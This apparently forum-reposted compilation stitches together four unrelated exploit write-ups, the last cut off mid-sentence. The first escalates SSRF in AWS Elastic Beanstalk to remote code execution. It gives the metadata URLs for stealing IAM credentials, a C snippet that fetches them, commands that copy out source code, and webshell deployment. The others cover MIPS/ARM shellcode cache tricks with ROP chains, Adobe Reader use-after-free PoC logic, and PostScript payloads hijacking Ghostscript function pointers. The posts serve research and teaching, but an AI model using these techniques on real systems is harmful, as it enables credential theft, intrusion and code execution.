AWS Elastic Beanstalk is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring.

Provisioning an Environment
AWS Elastic Beanstalk supports Web Server and Worker environment provisioning.
Web Server environment – Typically suited to run a web application or web APIs.
Worker environment – Suited for background jobs and long-running processes.

A new application can be configured by providing some information about the application and environment and uploading the application code in a zip or war file.
Figure 1: Creating an Elastic Beanstalk Environment

When a new environment is provisioned, AWS creates an S3 storage bucket, a security group, and an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions. When the code is deployed from the user's computer, a copy of the source code in a zip file is placed in an S3 bucket named elasticbeanstalk-region-account-id.
Figure 2: Amazon S3 buckets

Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that, by default, objects are stored unencrypted in the bucket (and are accessible only by authorized users).
Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html

Managed policies for the default instance profile, aws-elasticbeanstalk-ec2-role:
AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray.
AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks.
AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks.

The “AWSElasticBeanstalkWebTier” policy allows limited List, Read and Write permissions on S3 buckets. Buckets are accessible only if the bucket name starts with “elasticbeanstalk-”, and recursive access is also granted.
Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier”
Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html

Analysis
While we were continuing with our regular pentest, we came across a Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS call to an external domain, and further verified by accessing “http://localhost/server-status”, which was configured to allow access only from localhost, as shown in Figure 4 below.
http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status
Figure 4: Confirming SSRF by accessing the restricted page

Once SSRF was confirmed, we moved towards confirming that the service provider is Amazon, through server fingerprinting using services such as https://ipinfo.io. Thereafter, we tried querying AWS metadata through multiple endpoints, such as:
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role

We retrieved the account ID and region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”:
Figure 5: AWS Metadata – Retrieving the Account ID and Region

We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role”:
Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token

Note: The IAM security credential of “aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk.

We further configured the AWS Command Line Interface (CLI), as shown in Figure 7:
Figure 7: Configuring AWS Command Line Interface

The output of the “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8:
Figure 8: AWS CLI Output: get-caller-identity

So far, so good. Pretty standard SSRF exploit, right? This is where it got interesting…

Let’s explore further possibilities
Initially, we tried running multiple commands using the AWS CLI to retrieve information from the AWS instance. However, access to most of the commands was denied due to the security policy in place, as shown in Figure 9 below:
Figure 9: Access denied on ListBuckets operation

We also know that the managed policy “AWSElasticBeanstalkWebTier” only allows access to S3 buckets whose name starts with “elasticbeanstalk”. So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id. We worked out the bucket name using the information retrieved earlier (see Figure 5):
Region: us-east-2
Account ID: 69XXXXXXXX79
Now, the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”.

We listed the bucket resources for “elasticbeanstalk-us-east-2-69XXXXXXXX79” in a recursive manner using the AWS CLI:
aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/
Figure 10: Listing S3 Bucket for Elastic Beanstalk

We got access to the source code by downloading the S3 resources recursively, as shown in Figure 11:
aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata --recursive
Figure 11: Recursively copy all S3 Bucket Data

Pivoting from SSRF to RCE
Now that we had permission to add an object to the S3 bucket, we uploaded a PHP file (webshell101.php, inside the zip file) through the AWS CLI to explore the possibilities of remote code execution. It didn’t work, as the updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13:
Figure 12: Uploading a webshell through AWS CLI in the S3 bucket
Figure 13: 404 Error page for Web Shell in the current environment

We took this to our lab to explore some potential exploitation scenarios where this issue could lead us to an RCE.
Potential scenarios were:
Using CI/CD with AWS CodePipeline
Rebuilding the existing environment
Cloning from an existing environment
Creating a new environment with an S3 bucket URL

Using CI/CD with AWS CodePipeline:
AWS CodePipeline is a CI/CD service which builds, tests and deploys code every time there is a change in the code (based on the policy). The pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source providers, and multiple deployment providers, including Elastic Beanstalk. The official AWS blog on how this works can be found here:

The software release, in the case of our application, is automated using AWS CodePipeline, with the S3 bucket as the source repository and Elastic Beanstalk as the deployment provider.

Let’s first create a pipeline, as seen in Figure 14:
Figure 14: Pipeline settings
Select S3 as the source provider, select the S3 bucket name, and enter the object key, as shown in Figure 15:
Figure 15: Add source stage
Configure a build provider or skip the build stage, as shown in Figure 16:
Figure 16: Skip build stage
Add Amazon Elastic Beanstalk as the deploy provider and select an application created with Elastic Beanstalk, as shown in Figure 17:
Figure 17: Add deploy provider
A new pipeline is created, as shown below in Figure 18:
Figure 18: New Pipeline created successfully

Now, it’s time to upload a new file (the webshell) to the S3 bucket to execute system-level commands, as shown in Figure 19:
Figure 19: PHP webshell
Add the file to the object configured in the source provider, as shown in Figure 20:
Figure 20: Add webshell in the object
Upload the archive file to the S3 bucket using the AWS CLI command, as shown in Figure 21:
Figure 21: Copy webshell in S3 bucket
aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/

The moment the new file is uploaded, CodePipeline immediately starts the build process and, if everything is OK, deploys the code to the Elastic Beanstalk environment, as shown in Figure 22:
Figure 22: Pipeline Triggered
Once the pipeline has completed, we can access the web shell and execute arbitrary commands on the system, as shown in Figure 23:
Figure 23: Running system level commands
And here we got a successful RCE!

Rebuilding the existing environment:
Rebuilding an environment terminates all of its resources, removes them, and creates new resources. So in this scenario, it will deploy the latest available source code from the S3 bucket. The latest source code contains the web shell, which gets deployed, as shown in Figure 24:
Figure 24: Rebuilding the existing environment
Once the rebuilding process completes successfully, we can access our webshell and run system-level commands on the EC2 instance, as shown in Figure 25:
Figure 25: Running system level commands from webshell101.php

Cloning from the existing environment:
If the application owner clones the environment, the code is again taken from the S3 bucket, which deploys the application with the web shell. The environment cloning process is shown in Figure 26:
Figure 26: Cloning from an existing Environment

Creating a new environment:
While creating a new environment, AWS provides two options to deploy code: one to upload an archive file directly, and another to select an existing archive file from the S3 bucket. By selecting the S3 bucket option and providing an S3 bucket URL, the latest source code will be used for deployment. The latest source code contains the web shell, which gets deployed.
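As a recap of the foothold that started it all, here is a hedged sketch in C, using libcurl, of the metadata-theft step. In the actual attack these URLs were fetched server-side through the vulnerable doc parameter; the snippet simply shows the two endpoints that yield the role name and its temporary credentials:

#include <stdio.h>
#include <curl/curl.h>

int main(void) {
    /* First URL lists the attached role names; the second returns the
     * temporary Access Key, Secret Access Key, and Token for the
     * default Elastic Beanstalk role. */
    const char *urls[] = {
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
        "aws-elasticbeanstalk-ec2-role",
    };
    curl_global_init(CURL_GLOBAL_DEFAULT);
    for (int i = 0; i < 2; i++) {
        CURL *h = curl_easy_init();
        if (h == NULL)
            return 1;
        curl_easy_setopt(h, CURLOPT_URL, urls[i]);
        /* libcurl's default write callback prints the body to stdout */
        if (curl_easy_perform(h) != CURLE_OK)
            fprintf(stderr, "request failed: %s\n", urls[i]);
        curl_easy_cleanup(h);
        puts("");
    }
    curl_global_cleanup();
    return 0;
}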
References:
https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html
https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html
https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-welcome.html
https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb
https://ipinfo.io

<BH Marketing> Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open. </BH Marketing>

Source: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM
2/5/2019

gdb showing nonsensical crashes

To set the scene: you found a stack buffer overflow, wrote your shellcode to an executable heap or stack, and used your overflow to direct the instruction pointer to the address of your shellcode. Yet your shellcode is inconsistent, crashes frequently, and core dumps show the processor jumped to an address halfway through your shellcode, seemingly without executing the first half. The symptoms haven’t helped diagnose the problem; they’ve left you more confused. You’ve tried everything: changing the size of the buffer, page-aligning your code, even waiting extra cycles, but your code is still broken. When you turn on debug mode for the target process, or step through with a debugger, it works perfectly, but that isn’t good enough. Your code doesn’t self-modify, so you shouldn’t have to worry about cache coherency, right?

We accessed a root console via UART

That’s what happened to us on MIPS when we exploited a TP-Link router. In order to save time, we added a series of NOPs from the beginning of the shellcode buffer to where the processor often “jumped”, and put the issue in the queue to explore later. We encountered a similar problem on ARM when we exploited Devil’s Ivy on an ARM chip. We circumvented the problem by not using self-modifying shellcode and logged the issue so we could follow up later. Now that we have finished exploring lateral attacks, the research team has taken some time to dig into the shellcoding oddities that puzzled us earlier, and we’d like to share what we've learned.

MIPS: A Short Explanation and Solution

Overview of MIPS caches

Our MIPS shellcode did not self-modify, but it ran afoul of cache coherency anyway. MIPS maintains two caches, a data cache and an instruction cache. These caches are designed to increase the speed of memory access by conducting reads and writes to main memory asynchronously. The caches are completely separate: MIPS writes data to the data cache and instructions to the instruction cache. To save time, the running process pulls instructions and data from the caches rather than from main memory. When a value is not available from the cache, the processor syncs the cache with main memory before the process tries again.

When the TP-Link’s MIPS processor wrote our shellcode to the executable heap, it only wrote the shellcode to the data cache, not to main memory. Modified areas in the data cache are marked for later syncing with main memory. However, although the heap was marked executable, the processor didn’t automatically recognize our bytes as code and never updated the instruction cache with our new values. What’s more, even if the instruction cache had synced with main memory before our code ran, it still wouldn’t have received our values, because they had not yet been written from the data cache to main memory. Before our shellcode could run, it needed to move from the data cache to the instruction cache, by way of main memory, and that wasn't happening.

This explained the strange crashes. After our stack buffer overflow overwrote the stored return address with our shellcode address, the processor directed execution to the correct location, because the return address was data. However, it executed the old instructions that still occupied the instruction cache, rather than the ones we had recently written to the data cache. The buffer had previously been filled mostly by zeros, which MIPS interprets as NOPs.
Core dumps showed an apparent “jump” to the middle of our shellcode because the processor loaded our values just before, or during, generating the core dump. The processor hadn't synced because it assumed that the instructions that had been at that location would still be at that location, a reasonable assumption given that code does not usually change mid-execution. There are legitimate reasons for modifying code (most importantly, every time a new process loads), so chip manufacturers generally provide ways to flush the data and instruction caches. One easy way to cause a data cache write to main memory is to call sleep(), a well-known strategy which causes the processor to suspend operation for a specified period of time.

Originally, our ROP chain only consisted of two addresses: one to calculate the address of the shellcode buffer from two registers we controlled on the stack, and the next to jump to the calculated address. To call sleep() we inserted two addresses before the original ROP chain. The first code snippet set $a0 to 1. $a0 is the first argument to sleep() and tells it how many seconds to sleep. This code also loaded the registers $ra and $s0 from the stack, returning to the value we placed on the stack for $ra.

Setting up call to sleep()

The next code snippet called sleep(). Since sleep() returns to the return address passed into the function, we needed the return address to be something we controlled. We found a location that loaded the return address from the stack and then jumped to a register. We were pleased to find the code snippet below, which transfers the value in $s1, which we set to sleep(), into $t9 and then calls $t9 after loading $ra from the stack.

Calling sleep()

From there, we executed the rest of the ROP chain and finally achieved consistent execution of our exploit. Read on for more details about syncing the MIPS cache and why calling sleep() works, or scroll down for a discussion of ARM cache coherency problems.

In Depth on MIPS Caching

Most of the time when we talk about syncing data, we're trying to avoid race conditions between two entities sharing a data buffer. That is, at a high level, the problem we encountered: essentially a race condition between syncing our shellcode and executing it. If syncing won, the code would work; if execution won, it would fail. Because the caches do not sync frequently, as syncing is a time-consuming process, we almost always lost this race.

According to the MIPS Software Training materials (PDF) on caches, whenever we write instructions that the OS would normally write, we need to make the data cache and main memory coherent and then mark the area containing the old instructions in the instruction cache invalid, which is what the OS does every time it loads a new process into memory. The data and instruction caches store between 8 and 64 KB of values, depending on the MIPS processor. The instruction cache will sync with main memory if the processor encounters a syncing instruction, if execution is directed to a location outside the bounds of what is stored in the instruction cache, or after cache initialization. With a jump to the heap from a library more than a page away, we can be fairly certain that the values there will not be in the instruction cache, but we still need to write the data cache to main memory. We learned from devttys0 that sleep() would sync the caches. We tried it out and our shellcode worked!
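To make the race reproducible outside of an exploit, here is a hedged demo in C. The assumptions are ours: big-endian MIPS Linux and instruction encodings we wrote by hand; the point is only that the new bytes must reach main memory before the jump:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

/* Copy a tiny "return the argument" stub into an executable buffer,
 * then call sleep() so the modified data-cache lines are written back
 * to main memory before we jump to them. Without a sync, stale
 * instruction-cache contents may execute instead. */
int main(void) {
    static const unsigned char stub[] = {
        0x03, 0xe0, 0x00, 0x08,   /* jr   $ra                   */
        0x00, 0x80, 0x10, 0x25,   /* move $v0, $a0 (delay slot) */
    };
    void *buf = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return 1;
    memcpy(buf, stub, sizeof(stub));
    sleep(1);   /* the lazy flush; cacheflush(buf, sizeof(stub), BCACHE)
                 * from <sys/cachectl.h> is the precise alternative,
                 * discussed next */
    int (*fn)(int) = (int (*)(int))buf;
    printf("%d\n", fn(42));       /* expect 42 */
    return 0;
}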
We also learned about another option from emaze, calling cacheflush() from libc will more precisely flush the area of memory that you require. However, it requires the address, number of bytes, and cache to be flushed, which is difficult from ROP. Because calling sleep(), with its single argument, was far easier, we dug a little deeper to find out why it's so effective. During sleep, a process or thread gives up its allotted time and yields execution to the next scheduled process. However, a context switch on MIPS does not necessitate a cache flush. On older chips it may, but on modern MIPS instruction cache architectures, cached addresses are tagged with an ID corresponding to the process they belong to, resulting in those addresses staying in cache rather than slowing down the context switch process any further. Without these IDs, the processor would have to sync the caches during every context switch, which would make context switching even more expensive. So how did sleep() trigger a data cache write back to main memory? The two ways data caches are designed to write to main memory are write-back and write-through. Write-through means every memory modification triggers a write out to main memory and the appropriate cache. This ensures data from the cache will not be lost, but greatly slows down processing speed. The other method is write-back, where data is written only to the copy in the cache, and the subsequent write to main memory is postponed for an optimal time. MIPS uses the write-back method (if it didn’t, we wouldn’t have these problems) so we need to wait until the blocks of memory in the cache containing the modified values are written to main memory. This can be triggered a few different ways. One trigger is any Direct Memory Access (DMA) . Because the processor needs to ensure that the correct bytes are in memory before access occurs, it syncs the data cache with main memory to complete any pending writes to the selected memory. Another trigger is when the data cache requires the cache blocks containing modified values for new memory. As noted before, the data cache size is at least 8KB, large enough that this should rarely happen. However, during a context switch, if the data cache requires enough new memory that it needs in-use blocks, it will trigger a write-back of modified data, moving our shellcode from the data cache to main memory. As before, when the sleeping process woke, it caused an instruction cache miss when directing execution to our shellcode, because the address of the shellcode was far from where the processor expected to execute next. This time, our shellcode was in main memory, ready to be loaded into the instruction cache and executed. Wait, Isn't This a Problem on ARM Too? It sure is. ARM maintains separate data and instruction caches too. The difference is we’re far less likely to find executable heaps and stacks (which was the default on MIPS toolchains until recently). The lack of executable space ready for shellcode forces us to allocate a new buffer, copy our shellcode to it, mark it executable, and then jump to it. Using mprotect to mark a buffer executable triggers a cache flush, according to the Android Hacker’s Handbook. The section also includes an important and very helpful note. Excerpt from Chapter 9, Separate Code and Instruction Cache, "Android Hackers Handbook" However there are still times we need to sync the instruction cache on ARM, as in the case of exploiting Devil’s Ivy. 
We put together a ROP chain that gave us code execution and wrote self-modifying shellcode that decoded itself in place, because incoming data was heavily filtered. Although we included code that we thought would sync the instruction cache, the code crashed in the strangest ways. Again, the symptoms were not even close to what we expected. We saw the processor raise a segfault while executing a perfectly good piece of shellcode, a missed register write that caused an incomprehensible crash ten lines of code later, and a socket that connected but would not transmit data. Worse yet, when we attached gdb and went through the code step by step, it worked perfectly. There was no behavior that pointed to an instruction cache issue, and nothing easy to search for help on, other than "Why isn't my perfectly good shellcode working!?"

By now you can guess what the problem was, and we did too. If you are on ARMv7 or newer and running into odd problems, one solution is to execute data barrier and instruction cache sync instructions after you write, but before you execute, your new bytes, as shown below.

[Image: ARMv7+ cache syncing instructions]
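The instruction listings in the original post were images that did not survive the repost. Below is a minimal reconstruction of the ARMv7+ barrier pair, written as GCC inline assembly in C; this is hedged, since the original sequence may also have included explicit cache-maintenance operations:

/* Run this after writing the new code bytes and before jumping to them. */
__asm__ volatile (
    "dsb\n\t"   /* data synchronization barrier: completes pending writes */
    "isb\n\t"   /* instruction synchronization barrier: refetches the pipeline */
    ::: "memory"
);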
On ARMv6, instead of DSB and ISB, ARM provided MCR instructions to manipulate the cache. The following instructions have the same effect as DSB and ISB above, though prior to ARMv6 they were privileged and so won't work on older chips.

[Image: ARMv6 cache syncing instructions]

If you are too restricted by a filter to execute these instructions, as we were, neither of these solutions will work. While there are rumors about using SWI 0x9F0002 and overwriting the call number because the system interprets it as data, this method did not work for us, so we can't recommend it (but feel free to let us know if you tried it and it worked for you). One thing we could do is call mprotect() from libc on the modified shellcode, but an even easier thing is to call sleep(), just like we did on MIPS. We ran a series of experiments and determined that calling sleep() caused the caches to sync on ARMv6.

Our shellcode was limited by a filter, so, although we were executing shellcode at this point, we took advantage of functions in libc. We found the address of sleep(), but its lower byte was below the threshold of the filter. We added 0x20 to the address (the lowest byte allowed) to pass it through the filter and subtracted it again in our shellcode, as shown below.

[Image: Shellcode to call sleep()]

Although context switches don't directly cause cache invalidation, we suspect that the next process to execute often uses enough of the instruction cache that it requires blocks belonging to the sleeping process. The technique worked well on this processor and platform, but if it doesn't work for you, we recommend using mprotect() for higher certainty.

Conclusion

The way systems work in theory is not necessarily what happens in the real world. While chips have been designed to prevent additional overhead during context switches, no system runs precisely the way it was intended. We had fun digging into these issues. Diagnosing computer problems reminds us how difficult it can be to diagnose health conditions. Symptoms show up in a different location than their cause, like pain referred from one part of the leg to another, and simply observing the problem can change its behavior. Embedded devices were designed to be black boxes, telling us nothing and quietly going about the one task they were designed to do. With more insight into their behavior, we can begin to solve the security problems that confound us.

Just getting started in security? Check out the recent video series on the fundamentals of device security. Old hand? Try our team's research on lateral attacks, the vulnerability our ARM work was based on, and the MIPS-based router vulnerability.

Sursa: https://blog.senr.io/blog/why-is-my-perfectly-good-shellcode-not-working-cache-coherency-on-mips-and-arm
-
Using the Weblinks API to Reach JavaScript UAFs in Adobe Reader
February 06, 2019 | Abdul-Aziz Hariri

JavaScript vulnerabilities in Adobe Acrobat/Reader are getting fewer and fewer. I credit this to the "boom" that happened back in 2015 and 2016. Back then, a lot of Adobe Acrobat research emerged, ranging from JavaScript API bypasses to the classic memory corruption style vulnerabilities (i.e. Use-After-Free, Type Confusion, Heap/Stack Overflows, etc.). In fact, in 2015, ZDI disclosed 97 vulnerabilities affecting Adobe Acrobat/Reader, with almost 90% of them affecting the JavaScript API. 2016 had a slight increase, totaling 110 vulnerabilities with almost the same percentage of JavaScript vulnerabilities. Most of the vulnerabilities targeted non-privileged JavaScript APIs.

For those who are not familiar with Adobe Acrobat/Reader's JavaScript API, the first thing you should know is that the JavaScript engine is a fork of Mozilla's SpiderMonkey. Second, Adobe has a similar privileges architecture to SpiderMonkey. There are two privilege contexts: Privileged and Non-Privileged. This in turn also splits the JavaScript APIs into two: Privileged APIs and Non-Privileged APIs.

That said, it's worth noting that probably 90-95% of the corruption vulnerabilities affecting the JavaScript APIs over the past couple of years mainly targeted non-privileged APIs. That still leaves us with a huge sum of non-audited, non-fuzzed, non-touched privileged APIs. That's perfectly understandable, since auditing privileged APIs is more involved. It also requires a JavaScript privileges API bypass vulnerability to trigger and weaponize them. In other words, it's more expensive. Thus, most of the big numbers heard around public research on how someone found tens or hundreds of vulnerabilities in Acrobat/Reader are mostly (if not ALL) image parsing vulnerabilities. It's smart, if you ask me, but if you think that makes you hardcore, then we're waiting for you at Pwn2Own, with your favorite image parsing bug weaponized and all of your Adobe CVEs on the back of your T-shirt, of course.

Trolling aside, we do still get some JavaScript vulnerabilities every now and then. Slapping this.closeDoc into APIs for UAFs does not work anymore, as far as I can tell. Well, at least for non-privileged APIs. New JavaScript UAFs have been a little more elegant, though they still follow the same logic. For example, ZDI-18-1393, ZDI-18-1391, and ZDI-18-1394. While all three vulnerabilities are Use-After-Free vulnerabilities, the logic is interesting.

First, all of these are vulnerabilities that affected WebLinks. Links in Adobe Acrobat are generally handled inside the WebLinks.api plugin. There's a set of JavaScript APIs exposed to handle links. For example, the this.addLink API (where this is the Doc object) accepts two arguments and is used to add a new link to the specified page with the specified coordinates. Another API that is quite useful, as it forces the Link object to be freed *wink*, is the this.removeLinks API. As the name implies, it removes all the links on the specified page within the specified coordinates.
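The code examples in the original post were images. Below is a minimal reconstruction of the two calls based on the documented Acrobat JavaScript API; the page number and coordinates are arbitrary:

// Add a link on page 0 covering the given rectangle
var link = this.addLink(0, [100, 100, 200, 200]);
link.borderColor = color.red;

// Later: remove (and thereby free) every Link on page 0 within that rectangle
this.removeLinks(0, [100, 100, 200, 200]);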
So how do these APIs relate to the bugs I mentioned? Simple: create a Link with addLink, force the Link to be freed with removeLinks, and finally re-use it somehow. Well, it's not quite that simple, but that is the logic behind all of these bugs. Here's a breakdown of the PoCs:

ZDI-18-1393: The PoC defines an array. It then defines a getter for the first element. The getter's callback function calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderColor attribute set to the array defined earlier.

ZDI-18-1391: The PoC defines an object named "mode". It then defines a custom toString function which calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the highlightMode attribute set to the object defined earlier.

ZDI-18-1394: The PoC defines a variable named "width". It then defines a custom valueOf function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderWidth attribute set to the variable defined earlier.

Conclusion

Although a lot of the non-privileged APIs have been heavily audited, there are still methods that can yield good results. Don't forget that there's still a huge attack surface waiting to be audited underneath the privileged APIs. Regardless, some more ingredients are required to reach those APIs (API restriction bypasses), and even those can be challenging to find given the restriction mitigations that Adobe recently rolled into Acrobat/Reader.

That's it for today, folks. Until next time, you can find me on Twitter at @AbdHariri, and follow the team for the latest in exploit techniques and security patches.

Sursa: https://www.zerodayinitiative.com/blog/2019/2/6/using-the-weblinks-api-to-reach-javascript-uafs-in-adobe-reader
-
Exploiting CVE-2018-19134: remote code execution through type confusion in Ghostscript
February 05, 2019
Posted by Man Yue Mo

In this post I'll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you'd like to know more about how I used our QL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post.

The vulnerability

Let's first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s (or more commonly ref, which is a typedef of ref_s).

struct ref_s {
    struct tas_s tas;
    union v {
        ps_int intval;
        ...
        uint64_t dummy;
    } value;
};

This is a 16 byte structure in which tas_s occupies the first 8 bytes, containing the type information as well as the size for array, string, dictionary, etc.:

struct tas_s {
    ushort type_attrs;
    ushort _pad;
    uint32_t rsize;
};

The vulnerability I found is the result of a missing type check in the function zsetcolor: the type of pPatInst was not checked before interpreting it as a gs_pattern_instance_t.

static int
zsetcolor(i_ctx_t * i_ctx_p)
{
    ...
    if ((n_comps = cs_num_components(pcs)) < 0) {
        n_comps = -n_comps;
        if (r_has_type(op, t_dictionary)) {
            ref *pImpl, pPatInst;

            if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0)
                return code;
            if (code > 0) {
                code = array_get(imemory, pImpl, 0, &pPatInst);  //<--- Reported by Tavis Ormandy
                if (code < 0)
                    return code;

                cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t);  //<--- What's the type of &pPatInst?!
                n_numeric_comps = (pattern_instance_uses_base_space(cc.pattern)
                                       ? n_comps - 1
                                       : 0);

Here, r_ptr is a macro in iref.h:

#define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct))

The value of pstruct originates from PostScript, and is therefore controlled by the user. For example, the following input to setpattern (which calls zsetcolor under the hood) will result in pPatInst.value.pstruct evaluating to 0x41.

<< /Implementation [16#41] >> setpattern

Following the code into pattern_instance_uses_base_space, I see that the object that I control is now the pointer pinst, which the code interprets as a gs_pattern_instance_t pointer:

pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst)
{
    return pinst->type->procs.uses_base_space(
               pinst->type->procs.get_pattern(pinst)
           );
}

So it looks like I may be able to control a number of function pointers: get_pattern, uses_base_space, and pinst.

Creating a fake object

Let's see exactly how much of pinst is under my control. The PostScript type array is particularly useful here, as its value stores a ref pointer that points to the start of a ref array. This allows me to create a buffer pointed to by value, whose contents I can control. In the diagram above, a grey box indicates data that I have partial control of (I cannot control type_attrs and _pad in tas completely); green indicates the data that I have complete control of.

The crucial point here is that both value in a ref and type in a gs_pattern_instance_t have an offset of 8 bytes. This means that procs in pinst->type->procs will be the underlying PostScript array that is partially under my control.
It turns out that I can indeed control both the function pointers get_pattern and uses_base_space by using nested arrays:

GS> <</Implementation [[16#41 [16#51 16#52]]] >> setpattern

This sets pinst to the array [16#41 [16#51 16#52]] and shows that I indeed have full control over both uses_base_space and get_pattern. The next step: how do I use an arbitrary function pointer to achieve code execution?

8 bytes off an easy exploit

I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator. As a ref, its value is an op_proc_t, which is a function pointer. These can be reached by getting the operators off systemdict by their name:

GS> systemdict /put get ==
GS> --put--

So let's try to put some built-in functions in our fake array:

/arr 100 array def
systemdict /put get arr exch 1 exch put
systemdict /get get arr exch 0 exch put
<</Implementation [[16#41 arr]] >> setpattern

I'll be using the following PostScript idiom rather a lot: systemdict <foo> get <arr> exch <idx> exch put. This fetches foo from systemdict and stores it in array arr at index idx. There may exist a better way of achieving that, but keep in mind that I had never written a line of PostScript before I found these vulnerabilities, so please bear with me.

Indeed, I can now call the zget and zput C functions directly, instead of uses_base_space and get_pattern. So I can now call functions that I could already call from PostScript anyway; what did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t (an alias of gs_context_state_s; they do like their typedefs!), contains a lot of information that cannot be controlled from PostScript, among which are important security settings such as LockFilePermissions:

struct gs_context_state_s {
    ...
    bool LockFilePermissions;    /* accessed from userparams */
    ...
    /* Put the stacks at the end to minimize other offsets. */
    dict_stack_t dict_stack;
    exec_stack_t exec_stack;
    op_stack_t op_stack;
    struct i_plugin_holder_s *plugin_list;
};

When calling operators from PostScript, the arguments passed to the operator are stored in op_stack. By calling these functions from C directly and having control of the argument i_ctx_p, we'll be able to call functions as if Ghostscript were running without -dSAFER switched on. So let's try to create a PostScript array to fake the i_ctx_t context object.

PostScript function arguments are stored in i_ctx_p->op_stack.stack.p, which is a ref pointer that points to the arguments. In order to call PostScript functions with a fake context, I'll need to control p. The offset from i_ctx_p to p here is the same as the offset of op_stack, which is 0x270. As each ref is 0x10 bytes, this corresponds to the 39th element in the fake reference array (0x270 / 0x10 = 39).

As seen from the diagram, this alignment is not ideal. The op_stack.stack.p corresponds to the tas part of my array, which I don't control completely. If only op_stack corresponded to a value field of a ref, then I would have succeeded. What's more, tas stores metadata of a ref, so even if I had full control of it, I wouldn't be able to set it to the address of an arbitrary object without first knowing its address.
As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper.

Getting arbitrary read and write primitives

The idea now is to find a PostScript function that:

- Does not dereference the osp (op_stack.stack.p) pointer;
- Still does something "useful" to osp;
- Is available in SAFER mode.

Stack operators come to mind. The pop operator is particularly interesting:

zpop(i_ctx_t *i_ctx_p)
{
    os_ptr op = osp;

    check_op(1);
    pop(1);
    return 0;
}

It checks the value of the stack pointer against the bottom of the stack with check_op, which compares osp against the pointer osbot. If osp is greater than osbot, it then decreases the value of osp. It is a simple function that does not dereference osp, and it changes its value.

To see what I can gain from this, let's take a closer look at the structures of ref and op_stack side by side. Recall that in our fake object, op_stack is faked by the 39th element of a ref array, which is itself a ref. The field tas corresponds to p, while value corresponds to osbot. In particular, the three fields type_attrs, _pad and rsize combine to form the pointer p in op_stack. As explained before, type_attrs specifies the type of the ref object, as well as its accessibility. So by using pop, I can modify both the type and accessibility of an object of my choice!

One catch, though: pop only works if p is larger than osbot, which is the address of this ref object. So in order for this to work, the object that I am tampering with needs to be a string, array or dictionary that is large enough, so that rsize, which gives the top bytes of p, will combine with the others to give something that is greater than the pointer address of most ref objects. This prevents me from just modifying the accessibility of built-in read-only objects like systemdict to gain write access. Still, there are at least a couple of things that I can do:

